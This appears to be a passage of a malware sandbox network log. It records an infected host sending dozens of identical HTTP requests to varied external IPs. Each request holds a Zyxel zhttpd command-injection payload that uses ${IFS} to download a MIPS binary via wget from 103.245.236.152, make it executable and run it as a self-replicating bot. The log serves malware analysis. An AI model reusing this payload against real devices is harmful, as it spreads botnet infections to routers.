                                            Jan 14, 2024 15:50:50.645183086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7337192.168.2.2354754188.190.95.92443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.645203114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7338192.168.2.2348894136.80.158.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.645241022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7339192.168.2.235794697.241.8.190443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.645271063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7340192.168.2.2337938210.199.235.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.645314932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7341192.168.2.2346264183.34.238.252443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.645320892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7342192.168.2.235897871.249.76.249443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.645351887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7343192.168.2.2349958148.113.0.50443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.645400047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7344192.168.2.23430525.140.37.78443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.645431995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7345192.168.2.233381691.75.157.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.645466089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7346192.168.2.234044284.143.45.123443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.645477057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7347192.168.2.235216292.149.33.6443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.645505905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7348192.168.2.234945867.148.230.2443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.645517111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7349192.168.2.235098299.68.165.21443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.645535946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7350192.168.2.2347636182.49.224.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.645551920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7351192.168.2.233386273.159.252.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.645611048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7352192.168.2.2347820184.77.56.39443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.645623922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7353192.168.2.235137084.52.56.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.645648003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7354192.168.2.2355846106.26.203.150443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.645682096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7355192.168.2.2356326148.25.172.246443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.645703077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7356192.168.2.2335180174.43.170.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.645735979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7357192.168.2.2337792107.86.24.166443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.645757914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7358192.168.2.2350778176.165.127.83443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.645773888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7359192.168.2.233919627.193.83.186443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.645802021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7360192.168.2.2344272151.178.186.156443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.645834923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7361192.168.2.2358618216.166.81.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.645873070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7362192.168.2.234319846.209.143.202443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.645903111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7363192.168.2.233764489.218.50.53443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.645942926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7364192.168.2.2337808198.76.198.66443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.646003962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7365192.168.2.233287669.125.187.24443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.646008968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7366192.168.2.2343406192.59.96.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.646040916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7367192.168.2.2338984125.63.16.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.646059990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7368192.168.2.2340390218.86.118.34443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.646089077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7369192.168.2.235402236.154.19.211443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.646122932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7370192.168.2.233802631.227.101.151443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.646178961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7371192.168.2.2341634147.101.4.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.646198034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7372192.168.2.2351502196.52.115.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.646253109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7373192.168.2.233314098.90.159.95443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.646256924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7374192.168.2.234114441.41.48.251443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.646290064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7375192.168.2.234942091.48.237.220443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.646311045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7376192.168.2.233640682.217.8.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.646342993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7377192.168.2.233336279.184.18.236443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.646383047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7378192.168.2.234411443.233.40.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.646414042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7379192.168.2.2353474123.63.9.35443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.646447897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7380192.168.2.235619858.34.222.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.646476984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7381192.168.2.2349780102.8.179.174443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.646505117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7382192.168.2.2348506111.122.129.190443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.646507025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7383192.168.2.2357880126.52.244.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.646570921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7384192.168.2.2335778205.85.172.139443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.646605968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7385192.168.2.234506257.244.230.108443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.646621943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7386192.168.2.2339672144.80.26.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.646655083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7387192.168.2.233518458.8.46.160443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.646662951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7388192.168.2.233775875.114.127.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.646680117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7389192.168.2.235511670.228.180.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:50.649179935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7390192.168.2.234736423.118.163.16443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.644473076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7391192.168.2.233364288.216.250.85443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.644593954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7392192.168.2.235414069.166.180.169443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.644593954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7393192.168.2.2345782153.100.236.202443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.644613981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7394192.168.2.2359212203.1.142.115443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.644629955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7395192.168.2.2356132159.138.89.158443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.644695044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7396192.168.2.2338290156.178.38.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.644699097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7397192.168.2.233411059.80.20.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.644722939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7398192.168.2.233849246.134.98.159443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.644732952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7399192.168.2.2337784111.90.65.202443
                                            TimestampBytes transferredDirectionData
